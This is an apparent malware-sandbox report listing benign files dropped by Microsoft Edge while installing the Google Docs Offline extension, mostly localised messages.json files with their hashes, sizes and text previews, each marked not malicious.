                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
